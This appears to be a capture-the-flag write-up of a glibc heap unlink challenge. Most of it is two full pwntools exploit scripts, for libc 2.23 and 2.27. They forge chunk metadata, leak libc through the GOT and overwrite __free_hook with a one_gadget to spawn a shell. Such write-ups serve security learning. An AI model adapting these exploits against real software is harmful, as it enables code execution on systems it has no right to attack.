An unlink pwn problem (very fun)

I do not know the exact source of this problem; someone from a sister school asked me about it, but it was really a lot of fun.

Originally I thought about this problem a lot, but found that many things were particularly restricted. On top of that, there have been a lot of things worrying me recently (a bunch of exams to review for, four of them, and English is not ready yet), so I put the problem aside for a while. But the problem is really not that complicated; I just did not think of using unlink, and I am really not familiar with unlink ~

The problem's runtime is glibc version 2.23, but I do not have that environment, and we have not yet learned the precautions for the higher versions, so I used 2.23 libraries to solve it. This problem is a classic menu-style challenge.

Then there are a few relatively fresh points.

This has to be turned into a variable, or else the show function cannot be used.

The intent here is to limit edit to only 2 uses, but if we modify it to three or more, then it can be used without limit.

These two variables also make the next few steps convenient.

Then let's look at the code directly.

import sys
from pwn import *
context.log_level='debug'
#context.arch='amd64'

# With no command-line argument the binary is run locally, with LD_PRELOAD
# forcing a specific libc; the symbol lookups further down (libc.sym[...])
# and the hard-coded libc offset are only meaningful for that exact build.
if len(sys.argv)==1 :
	io=process('./pwn',env={'LD_PRELOAD':'/lib/x86_64-linux-gnu/libc-2.23.so'})
	elf=ELF('./pwn')
	libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
else :
	# Remote host/port and the remote libc path are left blank on this page;
	# this branch is a template that must be filled in before it can run.
	io=remote('',)
	elf=ELF('./pwn')
	libc=ELF('')

def add(a,b):
	"""Menu item '1': answer the index prompt with *a* and the content prompt with *b*.

	*a* is converted with str() and sent followed by a newline; *b* is sent
	verbatim with no newline appended. Uses the module-level ``io`` tube.
	"""
	replies = (('4.show\n', '1'), ('index:\n', str(a)))
	for expect, answer in replies:
		io.sendlineafter(expect, answer)
	io.sendafter('content:\n', b)

def delete(a):
	"""Menu item '2': send the index *a* as a decimal string (newline-terminated)."""
	for expect, answer in (('4.show\n', '2'), ('index:\n', str(a))):
		io.sendlineafter(expect, answer)

def edit(a,b):
	"""Menu item '3': send index *a* (decimal string), then the raw content *b*.

	*b* is sent with io.sendafter, so no newline is appended to it.
	"""
	replies = (('4.show\n', '3'), ('index:\n', str(a)))
	for expect, answer in replies:
		io.sendlineafter(expect, answer)
	io.sendafter('content:\n', b)

def show(a):
	"""Menu item '4': send the index *a* as a decimal string.

	The program's reply is not read here; the caller does its own io.recv().
	"""
	for expect, answer in (('4.show\n', '4'), ('index:\n', str(a))):
		io.sendlineafter(expect, answer)

# NOTE(review): expressions such as '\x00'*0x18+p64(fd) below concatenate a
# str with the bytes that p64() returns on Python 3 pwntools; the script
# appears to be written for Python 2 -- confirm before running it elsewhere.
#
# Fixed addresses: these are absolute .bss addresses from the binary, which
# presumably only hold if the binary is loaded at a fixed address (no PIE).
chunk_0_addr=0x404080
bss_flag=0x404188
# fd/bk are expressed relative to chunk_0_addr (-0x18 and -0x10).
fd=chunk_0_addr-0x18
bk=chunk_0_addr-0x10
# Seven allocations at indices 0..6, each with the content 'aaaa'.
add(0,'aaaa')
add(1,'aaaa')
add(2,'aaaa')
add(3,'aaaa')
add(4,'aaaa')
add(5,'aaaa')
add(6,'aaaa')
# Free index 0, then re-create it with a crafted body: qwords 0, 0x20, fd,
# bk, 0x20 and one trailing byte 0x90. The target program is not shown on
# this page, so the layout this relies on cannot be checked from here.
delete(0)
add(0,p64(0)+p64(0x20)+p64(fd)+p64(bk)+p64(0x20)+p8(0x90))
delete(1)
# From here on every edit(0, ...) writes 0x18 zero bytes, fd, and then one
# address; the author's comment on the next line indicates that the
# following edit(1, ...) then lands on bss_flag (the show/edit counters the
# prose above talks about).
edit(0,'\x00'*0x18+p64(fd)+p64(bss_flag))
edit(1,p32(1)+p32(3))# bss_show_flag bss_edit_flag
#gdb.attach(io)
# Same pattern, this time with the GOT entry of free, then show(1) to read it.
edit(0,'\x00'*0x18+p64(fd)+p64(elf.got['free']))
show(1)
# Exactly 6 bytes are read and zero-padded to 8. If show() prints anything
# before the pointer, the leak is wrong -- nothing here sanity-checks the
# value (e.g. that it lies in a plausible range) before it is used.
free_addr=u64(io.recv(6).ljust(8,'\x00'))
libc_base=free_addr-libc.sym['free']
success('libc_base'+hex(libc_base))
free_hook_addr=libc_base+libc.sym['__free_hook']
#system_addr=libc_base+libc.sym['system']
# Same pattern with __free_hook as the address. 0x4526a is a hard-coded
# libc-build-specific offset; the page does not say what it is, and it is
# only valid for the exact libc-2.23 build preloaded above -- confirm.
edit(0,'\x00'*0x18+p64(fd)+p64(free_hook_addr))
edit(1,p64(libc_base+0x4526a))
# Index 4 (allocated above with 'aaaa') is freed here.
delete(4)
#gdb.attach(io)
#pause()
io.interactive()

It also works on 2.27 (this one has tcache protection)

import sys
from pwn import *
context.log_level='debug'
#context.arch='amd64'

# Local run when no argument is given: LD_PRELOAD pins the libc used, which
# is what the libc.sym[...] lookups and the hard-coded offset below assume.
# Note this variant preloads libc.so.6 rather than the 2.23 file used above.
if len(sys.argv)==1 :
	io=process('./pwn',env={'LD_PRELOAD':'/lib/x86_64-linux-gnu/libc.so.6'})
	elf=ELF('./pwn')
	libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
else :
	# Remote host/port and the remote libc path are left blank on this page;
	# this branch is a template that must be filled in before it can run.
	io=remote('',)
	elf=ELF('./pwn')
	libc=ELF('')

def add(a,b):
	"""Menu item '1': send the index *a* (decimal string) and then the content *b*.

	*b* goes through io.sendafter, i.e. it is sent byte-for-byte with no
	trailing newline. Relies on the module-level ``io`` tube.
	"""
	choice_then_index = (('4.show\n', '1'), ('index:\n', str(a)))
	for expect, answer in choice_then_index:
		io.sendlineafter(expect, answer)
	io.sendafter('content:\n', b)

def delete(a):
	"""Menu item '2': send the index *a* as a decimal string (newline-terminated)."""
	for expect, answer in (('4.show\n', '2'), ('index:\n', str(a))):
		io.sendlineafter(expect, answer)

def edit(a,b):
	"""Menu item '3': send index *a* (decimal string), then the raw content *b*.

	*b* is sent with io.sendafter, so no newline is appended to it.
	"""
	choice_then_index = (('4.show\n', '3'), ('index:\n', str(a)))
	for expect, answer in choice_then_index:
		io.sendlineafter(expect, answer)
	io.sendafter('content:\n', b)

def show(a):
	"""Menu item '4': send the index *a* as a decimal string.

	Whatever the program prints in response is left for the caller to recv().
	"""
	for expect, answer in (('4.show\n', '4'), ('index:\n', str(a))):
		io.sendlineafter(expect, answer)

# NOTE(review): as in the 2.23 script, str+bytes concatenations such as
# '\x00'*0x18+p64(fd) indicate Python 2 pwntools; confirm before running
# under Python 3.
#
# Fixed .bss addresses from the binary (presumably no PIE). chunk_0_addr is
# assigned but not used below; chunk_28_addr is index 28's slot at 8 bytes
# per entry. bss_flag here is 0x404080+0x108 == 0x404188, the same value the
# 2.23 script uses.
chunk_0_addr=0x404080
chunk_28_addr=0x404080+8*28
bss_flag=0x404080+0x108
# fd/bk are relative to chunk_28_addr (-0x18 and -0x10) this time.
fd=chunk_28_addr-0x18
bk=chunk_28_addr-0x10
# Eighteen allocations at indices 0..17, each with 'aaaa'.
for i in range(18):
	add(i,'aaaa')

# Runs i = 16 down to 10. Each step frees index i, re-creates it with 0x28
# zero bytes followed by a single 0x91 byte, then frees index i+1. The note
# above says this is what the tcache (2.27) case needs; the program itself is
# not on this page, so the exact effect cannot be confirmed from here.
for i in range(17-7,17)[::-1]:
	delete(i)
	add(i, '\x00' * 0x28 + '\x91')
	delete(i + 1)

# Four more allocations (28..31) whose content is just a newline.
for i in range(28, 32):
	add(i, '\n')
# From here the sequence mirrors the 2.23 script with indices 28/29 in place
# of 0/1: a crafted re-allocation at 28, then repeated edit(28, ...) writes
# of 0x18 zero bytes, fd and one address, each followed by an edit/show on 29.
delete(28)
add(28,p64(0)+p64(0x20)+p64(fd)+p64(bk)+p64(0x20)+p8(0x90))
delete(29)
edit(28,'\x00'*0x18+p64(fd)+p64(bss_flag))
# Per the 2.23 script's comment these are the show/edit flags (1 and 3).
edit(29,p32(1)+p32(3))
edit(28,'\x00'*0x18+p64(fd)+p64(elf.got['free']))
show(29)
# 6 bytes read and zero-padded to 8; no check that the leak looks sane.
free_addr=u64(io.recv(6).ljust(8,'\x00'))
libc_base=free_addr-libc.sym['free']
success('libc_base'+hex(libc_base))
free_hook_addr=libc_base+libc.sym['__free_hook']
edit(28,'\x00'*0x18+p64(fd)+p64(free_hook_addr))
# 0xe42ee is a hard-coded offset for the libc.so.6 preloaded above; the page
# does not say what it is, so it must be re-derived for any other build.
edit(29,p64(libc_base+0xe42ee))
# Index 4 (allocated in the first loop, untouched by the 10..17 loop) is freed.
delete(4)

#gdb.attach(io)
#pause()
io.interactive()

 
